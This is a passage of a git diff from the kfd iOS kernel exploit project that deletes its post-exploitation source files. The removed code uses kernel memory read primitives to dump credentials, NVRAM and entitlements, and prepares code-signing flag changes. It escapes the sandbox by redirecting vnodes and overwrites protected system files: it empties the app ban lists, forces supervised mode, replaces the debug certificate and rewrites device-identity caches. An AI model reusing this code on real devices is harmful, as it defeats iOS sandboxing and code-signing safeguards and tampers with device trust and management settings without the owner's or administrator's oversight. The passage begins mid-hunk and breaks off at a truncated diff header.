//https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/EXTERNAL_HEADERS/CoreEntitlements/der_vm.h#L33 - uint64_t der_start = kread64(ce_ctx + 0x38); - printf("[i] der_start: 0x%llx\n", der_start); - uint64_t der_end = kread64(ce_ctx + 0x20); - printf("[i] der_end: 0x%llx\n", der_end); - uint64_t der_len = der_end - der_start; - printf("[i] der_len: 0x%llx\n", der_len); - - CS_GenericBlob der_ents_blob = {0}; - kreadbuf(der_start, (uint8_t *)&der_ents_blob, sizeof(der_ents_blob)); - uint32_t der_ents_data_len = der_ents_blob.length; - printf("[i] der_ents_blob.length: 0x%x\n", convertToLittleEndian(der_ents_data_len)); - - uint8_t *der_ents_data = malloc(der_len); - kreadbuf(der_start + 8, der_ents_data, der_len); - uint8_t *us_der_end = der_ents_data + der_len; - - NSMutableDictionary *entitlements = DEREntitlementsDecode(der_ents_data, us_der_end); - if(entitlements != nil) { - NSLog(@"[+] Got decoded entitlements!\n%@", entitlements); - } else { - HexDump(der_start, der_len); - } - free(der_ents_data); - - return 0; -} diff --git a/kfd/fun/fun.h b/kfd/fun/fun.h deleted file mode 100644 index d1b45a76..00000000 --- a/kfd/fun/fun.h +++ /dev/null @@ -1,26 +0,0 @@ -// -// fun.h -// kfd -// -// Created by Seo Hyun-gyu on 2023/07/25. -// - -#ifndef fun_h -#define fun_h - -#include -#include - -typedef mach_port_t io_object_t; -typedef io_object_t io_service_t, io_connect_t, io_registry_entry_t; -extern const mach_port_t kIOMasterPortDefault; - -void do_fun(char** enabledTweaks, int numTweaks); -uint64_t fun_nvram_dump(void); -void backboard_respring(void); -int funUcred(uint64_t proc); -int funCSFlags(char* process); -int funTask(char* process); -uint64_t fun_ipc_entry_lookup(mach_port_name_t port_name); - -#endif /* fun_h */ diff --git a/kfd/fun/fun.m b/kfd/fun/fun.m deleted file mode 100644 index 4fe5c40b..00000000 --- a/kfd/fun/fun.m +++ /dev/null @@ -1,377 +0,0 @@ -// -// fun.c -// kfd -// -// Created by Seo Hyun-gyu on 2023/07/25. -// - -#import -#import -#import -#import -#include -#include -#include -#include -#include -#include "krw.h" -#include "offsets.h" -#include "proc.h" -#include "vnode.h" -#include "grant_full_disk_access.h" -#include "thanks_opa334dev_htrowii.h" -#include "utils.h" -#include "helpers.h" -#include "cs_blobs.h" - -int funUcred(uint64_t proc) { - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - uint64_t ucreds = kread64(proc_ro + off_p_ro_p_ucred); - - uint64_t cr_label_pac = kread64(ucreds + off_u_cr_label); - uint64_t cr_label = cr_label_pac | 0xffffff8000000000; - printf("[i] self ucred->cr_label: 0x%llx\n", cr_label); - - uint64_t cr_posix_p = ucreds + off_u_cr_posix; - printf("[i] self ucred->posix_cred->cr_uid: %u\n", kread32(cr_posix_p + off_cr_uid)); - printf("[i] self ucred->posix_cred->cr_ruid: %u\n", kread32(cr_posix_p + off_cr_ruid)); - printf("[i] self ucred->posix_cred->cr_svuid: %u\n", kread32(cr_posix_p + off_cr_svuid)); - printf("[i] self ucred->posix_cred->cr_ngroups: %u\n", kread32(cr_posix_p + off_cr_ngroups)); - printf("[i] self ucred->posix_cred->cr_groups: %u\n", kread32(cr_posix_p + off_cr_groups)); - printf("[i] self ucred->posix_cred->cr_rgid: %u\n", kread32(cr_posix_p + off_cr_rgid)); - printf("[i] self ucred->posix_cred->cr_svgid: %u\n", kread32(cr_posix_p + off_cr_svgid)); - printf("[i] self ucred->posix_cred->cr_gmuid: %u\n", kread32(cr_posix_p + off_cr_gmuid)); - printf("[i] self ucred->posix_cred->cr_flags: %u\n", kread32(cr_posix_p + off_cr_flags)); - - return 0; -} - -void backboard_respring(void) { - kfd_xpc_crasher("com.apple.cfprefsd.daemon"); - kfd_xpc_crasher("com.apple.backboard.TouchDeliveryPolicyServer"); -} - -int funCSFlags(char* process) { - pid_t pid = getPidByName(process); - uint64_t proc = getProc(pid); - - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - printf("[i] %s proc->proc_ro: 0x%llx\n", process, proc_ro); - uint32_t csflags = kread32(proc_ro + off_p_ro_p_csflags); - printf("[i] %s proc->proc_ro->p_csflags: 0x%x\n", process, csflags); - -#define TF_PLATFORM 0x400 - -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ - -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ - -#define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */ - - csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL); - sleep(3); - printf("[i] setting csflags: 0x%x\n", process, csflags); - //kwrite32(proc_ro + off_p_ro_p_csflags, csflags); - - return 0; -} - -int funTask(char* process) { - pid_t pid = getPidByName(process); - uint64_t proc = getProc(pid); - printf("[i] %s proc: 0x%llx\n", process, proc); - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - - uint64_t pr_proc = kread64(proc_ro + off_p_ro_pr_proc); - printf("[i] %s proc->proc_ro->pr_proc: 0x%llx\n", process, pr_proc); - - uint64_t pr_task = kread64(proc_ro + off_p_ro_pr_task); - printf("[i] %s proc->proc_ro->pr_task: 0x%llx\n", process, pr_task); - - //proc_is64bit_data+0x18: LDR W8, [X8,#0x3D0] - uint32_t t_flags = kread32(pr_task + off_task_t_flags); - printf("[i] %s task->t_flags: 0x%x\n", process, t_flags); - - - /* - * RO-protected flags: - */ - #define TFRO_PLATFORM 0x00000400 /* task is a platform binary */ - #define TFRO_FILTER_MSG 0x00004000 /* task calls into message filter callback before sending a message */ - #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */ - #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state */ - - //uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro); - //printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro); - - return 0; -} - -uint64_t fun_ipc_entry_lookup(mach_port_name_t port_name) { - uint64_t proc = getProc(getpid()); - uint64_t proc_ro = kread64(proc + off_p_proc_ro); - - uint64_t pr_proc = kread64(proc_ro + off_p_ro_pr_proc); - printf("[i] self proc->proc_ro->pr_proc: 0x%llx\n", pr_proc); - - uint64_t pr_task = kread64(proc_ro + off_p_ro_pr_task); - printf("[i] self proc->proc_ro->pr_task: 0x%llx\n", pr_task); - - uint64_t itk_space_pac = kread64(pr_task + 0x300); - uint64_t itk_space = itk_space_pac | 0xffffff8000000000; - printf("[i] self task->itk_space: 0x%llx\n", itk_space); - uint32_t port_index = MACH_PORT_INDEX(port_name); - uint32_t table_size = kread32(itk_space + 0x14); - printf("[i] table_size: 0x%x, port_index: 0x%x\n", table_size, port_index); - if (port_index >= table_size) { - printf("[-] invalid port name 0x%x\n", port_name); - } - - //0x20 = IPC_SPACE_IS_TABLE_OFF - uint64_t is_table = kread64_smr(itk_space + 0x20); - printf("[i] self task->itk_space->is_table: 0x%llx\n", is_table); - - uint64_t entry = is_table + port_index * 0x18/*SIZE(ipc_entry)*/; - printf("[i] entry: 0x%llx\n", entry); - - uint64_t object_pac = kread64(entry + 0x0/*OFFSET(ipc_entry, ie_object)*/); - uint64_t object = object_pac | 0xffffff8000000000; - uint32_t ip_bits = kread32(object + 0x0/*OFFSET(ipc_port, ip_bits)*/); - uint32_t ip_refs = kread32(object + 0x4/*OFFSET(ipc_port, ip_references)*/); - uint64_t kobject_pac = kread64(object + 0x48/*OFFSET(ipc_port, ip_kobject)*/); - uint64_t kobject = kobject_pac | 0xffffff8000000000; - printf("[i] ipc_port: ip_bits 0x%x, ip_refs 0x%x\n", ip_bits, ip_refs); - printf("[i] ip_kobject: 0x%llx\n", kobject); - - return kobject; -} - -static uint32_t -extract32(uint32_t val, unsigned start, unsigned len) { - return (val >> start) & (~0U >> (32U - len)); -} - -typedef mach_port_t io_object_t; -typedef io_object_t io_service_t, io_connect_t, io_registry_entry_t; -extern const mach_port_t kIOMasterPortDefault; -#define kIODeviceTreePlane "IODeviceTree" -CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, uint32_t options); -#define IO_OBJECT_NULL ((io_object_t)0) -#define OS_STRING_LEN(a) extract32(a, 14, 18) - -typedef char io_string_t[512]; -io_registry_entry_t IORegistryEntryFromPath(mach_port_t master, const io_string_t path); - - -static uint64_t -lookup_io_object(io_object_t object) { - return fun_ipc_entry_lookup(object); -} - -static uint64_t -get_of_dict(io_registry_entry_t nvram_entry) { - uint64_t nvram_object = fun_ipc_entry_lookup(nvram_entry); - - return kread64(nvram_object + 0xc0); //io_dt_nvram_of_dict_off = 0xC0; -} - -static uint64_t print_key_value_in_os_dict(uint64_t os_dict) { - uint64_t os_dict_entry_ptr, string_ptr, val_ptr = 0; - uint32_t os_dict_cnt, cur_key_len, cur_val_len; - size_t max_key_len = 1024; - struct { - uint64_t key, val; - } os_dict_entry; - char *cur_key; - - if(((cur_key = malloc(max_key_len)) != NULL) /*&& ((cur_val = malloc(max_value_len)) != NULL)*/) { - os_dict_entry_ptr = kread64(os_dict + 0x20/*OS_DICTIONARY_DICT_ENTRY_OFF*/); - if(os_dict_entry_ptr != 0) { - os_dict_entry_ptr = os_dict_entry_ptr | 0xffffff8000000000; - printf("[i] os_dict_entry_ptr: 0x%llx\n", os_dict_entry_ptr); - os_dict_cnt = kread32(os_dict + 0x14/*OS_DICTIONARY_COUNT_OFF*/); - if(os_dict_cnt != 0) { - printf("[i] os_dict_cnt: 0x%x\n", os_dict_cnt); - while(os_dict_cnt-- != 0) { - kreadbuf(os_dict_entry_ptr + os_dict_cnt * sizeof(os_dict_entry), &os_dict_entry, sizeof(os_dict_entry)); - printf("key: 0x%llx, val: 0x%llx\n", os_dict_entry.key, os_dict_entry.val); - - //KEY - cur_key_len = kread32(os_dict_entry.key + 0xc/*OS_STRING_LEN_OFF*/); - if(cur_key_len == 0) { - break; - } - cur_key_len = OS_STRING_LEN(cur_key_len); - string_ptr = kread64(os_dict_entry.key + 0x10/*OS_STRING_STRING_OFF*/); - if(string_ptr == 0) { - break; - } - string_ptr = string_ptr | 0xffffff8000000000; - kreadbuf(string_ptr, cur_key, cur_key_len); - printf("[+] key_str: %s, key_str_len: 0x%x\n", cur_key, cur_key_len); - - - //VALUE - HexDump(os_dict_entry.val, 100); - cur_val_len = kread32(os_dict_entry.val + 0xc/*OS_STRING_LEN_OFF*/); - if(cur_val_len == 0) { - printf("[-] cur_val_len = 0\n"); - continue; - } - val_ptr = kread64(os_dict_entry.val + 0x18/*?*/); - val_ptr = val_ptr | 0xffffff8000000000; - if(val_ptr == 0) { - printf("[-] val_ptr = 0\n"); - continue; - } - - char* cur_val = malloc(cur_val_len); - kreadbuf(val_ptr, cur_val, cur_val_len); - printf("[+] val_str: %s, val_str_len: 0x%x\n", cur_val, cur_val_len); - free(cur_val); - } - } - } - free(cur_key); - } - return 0; -} - - -uint64_t fun_nvram_dump(void) { - - io_registry_entry_t nvram_entry = IORegistryEntryFromPath(kIOMasterPortDefault, kIODeviceTreePlane ":/options"); - - if(nvram_entry != IO_OBJECT_NULL) { - printf("[i] nvram_entry: 0x%x\n", nvram_entry); - - uint64_t of_dict = get_of_dict(nvram_entry); - printf("[i] of_dict: 0x%llx\n", of_dict); - - print_key_value_in_os_dict(of_dict); - } - return 0; -} - -// Function to find files with specific extensions in a directory, doesn't work??? wtf? -NSArray *findFilesWithExtensions(NSArray *extensions, NSString *directory) { - NSFileManager *fileManager = [NSFileManager defaultManager]; - NSArray *fileNames = [fileManager contentsOfDirectoryAtPath:directory error:nil]; - - NSMutableArray *filePaths = [NSMutableArray array]; - for (NSString *fileName in fileNames) { - if ([extensions containsObject:fileName.pathExtension]) { - [filePaths addObject:[directory stringByAppendingPathComponent:fileName]]; - } - } - - return filePaths; -} - -NSDictionary *changeDictValue(NSDictionary *dictionary, NSString *key, id value) { - NSMutableDictionary *mutableDictionary = [dictionary mutableCopy]; - [mutableDictionary setValue:value forKey:key]; - return [mutableDictionary copy]; -} - -@interface MyUtility : NSObject - -+ (void)applyDynamicIsland; - -@end - -@implementation MyUtility - -+ (void)applyDynamicIsland { - printf("Tryna apply dynamic island"); - sleep(1); - NSString *backupFilePath = [NSString stringWithFormat:@"%@/com.apple.MobileGestalt-BACKUP.plist", NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES)[0]]; - - if (![[NSFileManager defaultManager] fileExistsAtPath:backupFilePath]) { - NSString *sourceFilePath = @"/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist"; - NSData *plistData = [NSData dataWithContentsOfFile:sourceFilePath]; - [plistData writeToFile:backupFilePath atomically:YES]; - } - - NSData *plistData = [NSData dataWithContentsOfFile:backupFilePath]; - NSError *error = nil; - NSDictionary *plist = [NSPropertyListSerialization propertyListWithData:plistData options:0 format:nil error:&error]; - - if (error) { - NSLog(@"Error while reading plist: %@", error); - return; - } - - NSDictionary *newPlist = changeDictValue(plist, @"ArtworkDeviceSubType", @2796); - NSData *newData = [NSPropertyListSerialization dataWithPropertyList:newPlist format:NSPropertyListBinaryFormat_v1_0 options:0 error:&error]; - - if (error) { - NSLog(@"Error while serializing plist: %@", error); - return; - } - - if (newData.length == plistData.length) { - NSLog(@"Same Size!"); - NSString *temporaryFilePath = [NSTemporaryDirectory() stringByAppendingPathComponent:@"temp_com.apple.MobileGestalt.plist"]; - [newData writeToFile:temporaryFilePath atomically:YES]; - funVnodeOverwriteFile(@"/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist", temporaryFilePath.UTF8String); - } else { - NSLog(@"OLD DATA: %lu", (unsigned long)plistData.length); - NSLog(@"NEW DATA: %lu", (unsigned long)newData.length); - } -} - - -void do_fun(char** enabledTweaks, int numTweaks) { - - _offsets_init(); - - uint64_t kslide = get_kslide(); - uint64_t kbase = 0xfffffff007004000 + kslide; - printf("[i] Kernel base: 0x%llx\n", kbase); - printf("[i] Kernel slide: 0x%llx\n", kslide); - uint64_t kheader64 = kread64(kbase); - printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64); - - pid_t myPid = getpid(); - uint64_t selfProc = getProc(myPid); - printf("[i] self proc: 0x%llx\n", selfProc); - - funUcred(selfProc); - funProc(selfProc); -// kfd_grant_full_disk_access(^(NSError* error) { -// NSLog(@"[-] grant_full_disk_access returned error: %@", error); -// }); - for (int i = 0; i < numTweaks; i++) { - char *tweak = enabledTweaks[i]; - printf("[i] tweaks\n"); - if (strcmp(tweak, "enableHideHomebar") == 0) { - funVnodeHide("/System/Library/PrivateFrameworks/MaterialKit.framework/Assets.car"); - } - if (strcmp(tweak, "HideDock") == 0) { - funVnodeHide("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockDark.materialrecipe"); - funVnodeHide("/System/Library/PrivateFrameworks/CoreMaterial.framework/dockLight.materialrecipe"); - } - if (strcmp(tweak, "enableReplacecert") == 0) { - funVnodeOverwrite2("/System/Library/Lockdown/iPhoneDebug.pem", [NSString stringWithFormat:@"%@%@", NSBundle.mainBundle.bundlePath, @"/files/cert.pem"].UTF8String); - } - if (strcmp(tweak, "enableCustomFont") == 0) { - funVnodeOverwrite2("/System/Library/Fonts/CoreUI/SFUI.ttf", [NSString stringWithFormat:@"%@%@", NSBundle.mainBundle.bundlePath, @"/files/SFUI.ttf"].UTF8String); - } - if (strcmp(tweak, "changeRegion") == 0) { - regionChanger(@"C", @"C/A"); - } - if (strcmp(tweak, "whitelist") == 0) { - whitelist(); - } - if (strcmp(tweak, "supervise") == 0) { - setSuperviseMode(true); - } - } -} -@end diff --git a/kfd/fun/utils.h b/kfd/fun/utils.h deleted file mode 100644 index 5913bb37..00000000 --- a/kfd/fun/utils.h +++ /dev/null @@ -1,24 +0,0 @@ -// -// utils.h -// kfd -// -// Created by Seo Hyun-gyu on 2023/07/30. -// - -#include -#include -#include - -uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath); -uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath); -int clearUICache(void); -int VarMobileWriteTest(void); -int VarMobileRemoveTest(void); -int VarMobileWriteFolderTest(void); -int VarMobileRemoveFolderTest(void); -int setSuperviseMode(bool enable); -int removeKeyboardCache(void); -int regionChanger(NSString *country_value, NSString *region_value); -void HexDump(uint64_t addr, size_t size); -bool sandbox_escape_can_i_access_file(char* path, int mode); -int whitelist(void); diff --git a/kfd/fun/utils.m b/kfd/fun/utils.m deleted file mode 100644 index 4ee0c556..00000000 --- a/kfd/fun/utils.m +++ /dev/null @@ -1,317 +0,0 @@ -// -// utils.m -// kfd -// -// Created by Seo Hyun-gyu on 2023/07/30. -// - -#import -#import -#import -#import -#import -#import "proc.h" -#import "vnode.h" -#import "krw.h" -#import "helpers.h" -#include "offsets.h" -#import "thanks_opa334dev_htrowii.h" -#import -#import "utils.h" - -uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath) { - [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; - [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; - uint64_t orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); - return orig_to_v_data; -} - -uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath) { - funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); - [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; - return 0; -} - -int VarMobileWriteTest(void) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t var_mobile_vnode = getVnodeVarMobile(); - - uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - //create - int open_fd = open([mntPath stringByAppendingString:@"/can_i_remove_file"].UTF8String, O_WRONLY | O_CREAT | O_TRUNC, 0644); - const char* data = "PLZ_GIVE_ME_GIRLFRIENDS!@#"; - write(open_fd, data, strlen(data)); - close(open_fd); - - dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - -int VarMobileWriteFolderTest(void) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t var_mobile_vnode = getVnodeVarMobile(); - - uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - //create - mkdir([mntPath stringByAppendingString:@"/can_i_remove_folder"].UTF8String, 0755); - - dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - -int VarMobileRemoveTest(void) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t var_mobile_vnode = getVnodeVarMobile(); - - uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - //remove - int ret = remove([mntPath stringByAppendingString:@"/can_i_remove_file"].UTF8String); - printf("remove ret: %d\n", ret); - - dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - -int VarMobileRemoveFolderTest(void) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t var_mobile_vnode = getVnodeVarMobile(); - - uint64_t orig_to_v_data = createFolderAndRedirect(var_mobile_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - //remove - [[NSFileManager defaultManager] removeItemAtPath:[mntPath stringByAppendingString:@"/can_i_remove_folder"] error:nil]; - - dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile directory list: %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - -int clearPlist(NSString *path) { - NSDictionary *dictionary = @{}; - - BOOL success = [dictionary writeToFile:path atomically:YES]; - if (!success) { - printf("[-] Failed createPlistAtPath.\n"); - return -1; - } - - return 0; -} - -int whitelist() { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - //1. Create files - uint64_t var_tmp_vnode = getVnodeAtPathByChdir("/var/tmp"); - printf("[i] /var/tmp vnode: 0x%llx\n", var_tmp_vnode); - - uint64_t orig_to_v_data = createFolderAndRedirect(var_tmp_vnode, mntPath); - - clearPlist([mntPath stringByAppendingString:@"/Rejections.plist"]); - clearPlist([mntPath stringByAppendingString:@"/AuthListBannedUpps.plist"]); - clearPlist([mntPath stringByAppendingString:@"/AuthListBannedCdHashes.plist"]); - clearPlist([mntPath stringByAppendingString:@"/AGP.plist"]); - clearPlist([mntPath stringByAppendingString:@"/UserTrustedUpps.plist"]); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - - //2. Copy - - funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/Rejections.plist", "/var/tmp/Rejections.plist"); - funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/AuthListBannedUpps.plist", "/var/tmp/AuthListBannedUpps.plist"); - funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/AuthListBannedCdHashes.plist", "/var/tmp/AuthListBannedCdHashes.plist"); - funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/AGP.plist", "/var/tmp/AGP.plist"); - funVnodeOverwriteFileUnlimitSize("/var/db/MobileIdentityData/UserTrustedUpps.plist", "/var/tmp/UserTrustedUpps.plist"); - - return 0; -} - -int setSuperviseMode(BOOL enable) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t configurationprofiles_vnode = getVnodeAtPathByChdir("/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles"); - printf("[i] /var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles vnode: 0x%llx\n", configurationprofiles_vnode); - - uint64_t orig_to_v_data = createFolderAndRedirect(configurationprofiles_vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles directory list:\n %@", dirs); - - //set value of "IsSupervised" key - NSString *plistPath = [mntPath stringByAppendingString:@"/CloudConfigurationDetails.plist"]; - - NSMutableDictionary *plist = [NSMutableDictionary dictionaryWithContentsOfFile:plistPath]; - - if (plist) { - // Set the value of "IsSupervised" key to true - [plist setObject:@(enable) forKey:@"IsSupervised"]; - - // Save the updated plist back to the file - if ([plist writeToFile:plistPath atomically:YES]) { - printf("[+] Successfully set IsSupervised in the plist."); - } else { - printf("[-] Failed to write the updated plist to file."); - } - } else { - printf("[-] Failed to load the plist file."); - } - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - -int removeKeyboardCache(void) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - - uint64_t vnode = getVnodeAtPath("/var/mobile/Library/Caches/com.apple.keyboards/images"); - if(vnode == -1) return 0; - - uint64_t orig_to_v_data = createFolderAndRedirect(vnode, mntPath); - - NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile/Library/Caches/com.apple.keyboards/images directory list:\n %@", dirs); - - for(NSString *dir in dirs) { - NSString *path = [NSString stringWithFormat:@"%@/%@", mntPath, dir]; - [[NSFileManager defaultManager] removeItemAtPath:path error:nil]; - } - - dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL]; - NSLog(@"/var/mobile/Library/Caches/com.apple.keyboards/images directory list:\n %@", dirs); - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return 0; -} - -#define COUNTRY_KEY @"h63QSdBCiT/z0WU6rdQv6Q" -#define REGION_KEY @"zHeENZu+wbg7PUprwNwBWg" -int regionChanger(NSString *country_value, NSString *region_value) { - NSString *plistPath = @"/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist"; - NSString *rewrittenPlistPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/com.apple.MobileGestalt.plist"]; - - remove(rewrittenPlistPath.UTF8String); - - NSDictionary *dict1 = [NSDictionary dictionaryWithContentsOfFile:plistPath]; - NSMutableDictionary *mdict1 = dict1 ? [dict1 mutableCopy] : [NSMutableDictionary dictionary]; - NSDictionary *dict2 = dict1[@"CacheExtra"]; - - NSMutableDictionary *mdict2 = dict2 ? [dict2 mutableCopy] : [NSMutableDictionary dictionary]; - mdict2[COUNTRY_KEY] = country_value; - mdict2[REGION_KEY] = region_value; - [mdict1 setObject:mdict2 forKey:@"CacheExtra"]; - - NSData *binaryData = [NSPropertyListSerialization dataWithPropertyList:mdict1 format:NSPropertyListBinaryFormat_v1_0 options:0 error:nil]; - [binaryData writeToFile:rewrittenPlistPath atomically:YES]; - - funVnodeOverwrite2(plistPath.UTF8String, rewrittenPlistPath.UTF8String); - - return 0; -} - -//NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; -//// /var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles/CloudConfigurationDetails.plist -// -//uint64_t systemgroup_vnode = getVnodeSystemGroup(); -// -////must enter 3 subdirectories -//uint64_t configurationprofiles_vnode = findChildVnodeByVnode(systemgroup_vnode, "systemgroup.com.apple.configurationprofiles"); -//while(1) { -// if(configurationprofiles_vnode != 0) -// break; -// configurationprofiles_vnode = findChildVnodeByVnode(systemgroup_vnode, "systemgroup.com.apple.configurationprofiles"); -//} -//printf("[i] /var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles vnode: 0x%llx\n", configurationprofiles_vnode); - - -void HexDump(uint64_t addr, size_t size) { - void *data = malloc(size); - kreadbuf(addr, data, size); - char ascii[17]; - size_t i, j; - ascii[16] = '\0'; - for (i = 0; i < size; ++i) { - if ((i % 16) == 0) - { - printf("[0x%016llx+0x%03zx] ", addr, i); -// printf("[0x%016llx] ", i + addr); - } - - printf("%02X ", ((unsigned char*)data)[i]); - if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { - ascii[i % 16] = ((unsigned char*)data)[i]; - } else { - ascii[i % 16] = '.'; - } - if ((i+1) % 8 == 0 || i+1 == size) { - printf(" "); - if ((i+1) % 16 == 0) { - printf("| %s \n", ascii); - } else if (i+1 == size) { - ascii[(i+1) % 16] = '\0'; - if ((i+1) % 16 <= 8) { - printf(" "); - } - for (j = (i+1) % 16; j < 16; ++j) { - printf(" "); - } - printf("| %s \n", ascii); - } - } - } - free(data); -} - -bool sandbox_escape_can_i_access_file(char* path, int mode) { - NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; - uint64_t vnode = getVnodeAtPathByChdir([[NSString stringWithUTF8String:path] stringByDeletingLastPathComponent].UTF8String); - uint64_t orig_to_v_data = createFolderAndRedirect(vnode, mntPath); - - NSString *mountedPath = [NSString stringWithFormat:@"%@/%@", mntPath, [[NSString stringWithUTF8String:path] lastPathComponent]]; - - bool ret = false; - - if(access(mountedPath.UTF8String, mode) == 0) { - ret = true; - } - - UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); - - return ret; -} diff --git a/kfd/kfd-Bridging-Header.h b/kfd/kfd-Bridging-Header.h index 20f29a5f..52309c17 100644 --- a/kfd/kfd-Bridging-Header.h +++ b/kfd/kfd-Bridging-Header.h @@ -2,13 +2,5 @@ * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ -#include "fun/fun.h" -#include "fun/krw.h" -#include "fun/thanks_opa334dev_htrowii.h" -#include "fun/vnode.h" -#include "fun/helpers.h" -#include "KFD-manager.h" -//#include "filemanager_by_akusio/ViewController.h" -//#include "filemanager_by_akusio/AXFileViewController.h" -#include "../MiniRootFileManager15/filemanager_by_akusio/ViewController.h" -#include "../MiniRootFileManager15/filemanager_by_akusio/AXFileViewController.h" +#include "overwrite/fun.h" +#include "overwrite/krw.h" diff --git a/kfd/libkfd.h 